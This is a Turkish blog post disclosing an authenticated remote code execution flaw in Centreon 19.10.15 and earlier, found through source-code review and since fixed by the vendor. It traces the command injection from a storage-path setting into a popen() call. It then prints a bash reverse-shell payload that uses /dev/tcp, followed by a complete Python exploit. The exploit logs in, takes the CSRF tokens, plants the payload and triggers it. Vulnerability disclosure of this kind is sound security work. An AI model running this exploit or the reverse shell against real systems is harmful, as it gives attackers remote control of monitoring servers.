Published

Tuesday 25 March 2020

←Home

Centreon <= 19.10.15 Authenticated Remote Code Execution

Merhaba, Centreon adında açık kaynaklı bir ağ yönetim yazılımında Hasan Ekin'in katkılarıyla keşfettiğim Authenticated RCE zafiyetinin detaylı bulumunu anlatıyor olacağım. Bir önceki yazıda olduğu gibi türkçeye kaynak kazandırmak adına makaleyi türkçe kaleme aldım.

AUTHENTICAD RCE

Authenticated, zafiyetinin tetiklemesi için geçerli bir kullanıcı gerekli olduğunu belirtir. RCE ise uygulama üzerinden uygulamanın çalıştığı sunucuda sistem kodları çalıştırabilmemize olanak sağlayan zafiyet türüdür.

Centreon

 1. Uygulama indirme linki: Centreon Downloads
 2. Zafiyeti tespit edildiği sürüm: <= 19.10.15
 3. Zafiyet giderildi ve Centron tarafından özel teşekkür alındı: https://github.com/centreon/centreon/pull/8467

BÖLÜM 1: Uygulama Eldesi

Kaynak kod analizini keyfi istekler doğrultusunda yapmamızdan ötürü bu uygulamanın adını Exploit-DB üzerinde gezinirken gördüm. Tespit ettiğimiz zafiyet harici rce zafiyetleride bulunuyordu. Kurulum manuel yapılabileceği gibi yayıncı tarafından hazır OVA ve OVF dosyaları Downloads sayfasına koyulmuş. OVF dosyasını indirip VmwareFUSION ile sanal makineyi ayaklandırdık.


Bölüm 2: Kaynak Kod Eldesi

Sanal makine üzerinde gezinirken uygulamaya ait dosyaların /usr/share/centron dizininde olduğunu saptadık.

Centreon

Kodları daha uygun bir ortadamda IDE üzerinden incelemek için dizini TAR ile sıkıştırdım ve SCP kullanarak ana makineye aktardık.

tar -czvf Centreon.tar.gz /usr/share/centron/
scp root@CentreonIP:/usr/share/centron/Centreon.tar.gz /tmp/Centreon.tar.gz

Bölüm 3: Kaynak Kodun İncelenmesi

Dosyaları kendi tercih ettiğim ATOM idesini kullanarak kurcalamaya başladık.

Diğer makalelerimde de olduğu gibi kodlar arasında aşağıda belirttiğim sistem fonksiyonlarını aramaya başladık:

system, exec, shell_exec, popen, eval, passthru

Boşa geçirilen epey bir saatin sonunda /www/include/views/graphs/graphStatus/displayServiceStatus.php dosyasının 302. satırında zafiyetli olabilecek bir noktayı saptadık.

Centreon

Sistem fonksiyonu olarak popen() fonksiyonu kullanılıyor ve $command_line isminde henüz nereden geldiği belli olmayan bir değişkeni parametre olarak alıyordu. Dosya üzerinde biraz daha gezinince $command_line değişkeninin aynı dosyanın data üst satırlarında veritabanından gelen verilerle oluşturulduğunu gördüm.

Centreon

Yaklaşık 3 saat 205-215. satırlar arasında yer alan service_description, host_name değişkenleri kontrol edip edemeyeceğimize üzerinde uğraş verdik. Sonunda ilgili değerleri sistem üzerine verebileceğim bir nokta tespit ettiğimizi sanmıştık ki:

Centreon

Güncellenilen hiç bir değerin gerekli tablo üzerinde değişmediğini gördük. Zafiyetli fonksiyona parametre olarak verilen veriler Centreon_storage adında bir veritabanı üzerinden geliyordu, arayüzden güncellediklerimse Centreon adında bir veritabanında güncelleniyordu. Bu durumun farkına ise aynı dosyanın 128-136. satırları arasında yer alan veritabanı sorgularına bakınca vardık.

Centreon

index_data isimli bir tablo Centreon veritabanı üzerinde bulunmuyordu fakat Centreon_storage veritabanında bulunuyordu.

Centreon

Bir kaç saat uğraşında ardından Centreon_storage veritabanı altında bulunan index_data tablosunu güncelleyebileceğim hiç bir nokta saptayamadık. Bunun yerine diğer girdilere oynamaya çalıştım, graph verileri üzerinde güncelleme yapabileceğim noktalar vardı fakat casting işlemlerinden ötürü string veremiyorduk o yüzden onlarıda es geçtik. Tekrar irdelemenin ardından $command_line değişkenine eklenen farklı bir girdi daha bulduk.
116. satırda bulunan $RRDdatabase_path değişkeni.

Centreon

Bu değişken getStatusDBDir($pearDBO) fonksiyonundan dönen değeri alıyordu. Kodları biraz kurcalayıp ilgili fonksiyonun aynı dosyanın 58-63. satırları arasında tanımlandığını ve ilgili değişkeninde veritabanından geldiğini saptadık.

Centreon

Eğer veritabanı üzerinden gelen bu değeri güncellemenin bir yolunu bulabilirsek pekala komutlarımıda çalıştırabilirdik. Tekrar kodları kurcalamakla geçirilen bir sürenin ardından, /include/Administration/parameters/DB-Func.php dosyasının 791. satırında tanımlanan updateODSConfigData fonksiyonunda ilgili değerin güncellendiğini gördük.

Centreon

Yani eğer ki updateODSConfigData fonksiyonunu kontrol eden ve kullanıcıdan girdi alan bir nokta bulursak zafiyeti tetikleyebilirdik. IDElerin arama özelliğini kullanarak ilgili fonksiyonunun çağırıldığı yerleri saptadık:

Centreon

Ilgili noktaya kullanıcı arayüzünden gittiğimde artık RCE'yi tetiklemek için önümüzde herhangi bir engel kalmadı.

Centreon


Bölüm 4: Payload Hazırlanması

Girdinin önüne ve sonuna eklenen değerlerden kurtulmak için payload taslağımız ; PAYLOAD ; şeklinde olacak.
Reverse shell payload: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1


BÖLÜM 5: EXPLOIT

Exploit-DB: Exploit

   #!/usr/bin/python

   import requests
   import sys
   import warnings
   from bs4 import BeautifulSoup

   warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

   if len(sys.argv) < 6:
   	print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
   	exit()

   url = sys.argv[1]
   username = sys.argv[2]
   password = sys.argv[3]
   ip = sys.argv[4]
   port = sys.argv[5]

   req = requests.session()
   print("[+] Retrieving CSRF token...")
   loginPage = req.get(url+"/index.php")
   response = loginPage.text
   s = BeautifulSoup(response, 'html.parser')
   Centreon_token = s.findAll('input')[3].get("value")

   login_creds = {
     "useralias": username,
     "password": password,
     "submitLogin": "Connect",
     "Centreon_token": Centreon_token
   }


   print("[+] Sendin login request...")
   login = req.post(url+"/index.php", login_creds)

   if "incorrect" not in login.text:
     print("[+] Logged In, retrieving second token")

     page = url + "/main.get.php?p=50118"
     second_token_req = req.get(page)
     response = second_token_req.text
     s = BeautifulSoup(response, 'html.parser')
     second_token = s.find('input', {'name':'Centreon_token'})['value']

     payload = {
       "RRDdatabase_path": "/var/lib/Centreon/metrics/",
       "RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port),
       "RRDdatabase_nagios_stats_path": "/var/lib/Centreon/nagios-perf/",
       "reporting_retention": "365",
       "archive_retention": "31",
       "len_storage_mysql": "365",
       "len_storage_rrd": "180",
       "len_storage_downtimes": "0",
       "len_storage_comments": "0",
       "partitioning_retention": "365",
       "partitioning_retention_forward": "10",
       "cpartitioning_backup_directory": "/var/cache/Centreon/backup",
       "audit_log_option": "1",
       "audit_log_retention": "0",
       "submitC": "Save",
       "gopt_id": "",
       "o": "storage",
       "o": "storage",
       "Centreon_token": second_token,


     }
     print("[+] Sendin payload...")
     send_payload = req.post(page, payload)

     trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php"
     print("[+] Triggerring payload...")
     trigger = req.get(trigger_url)

     print("[+] Check your listener !...")

   else:
     print("[-] Wrong credentials or may the system patched.")
     exit()Go Top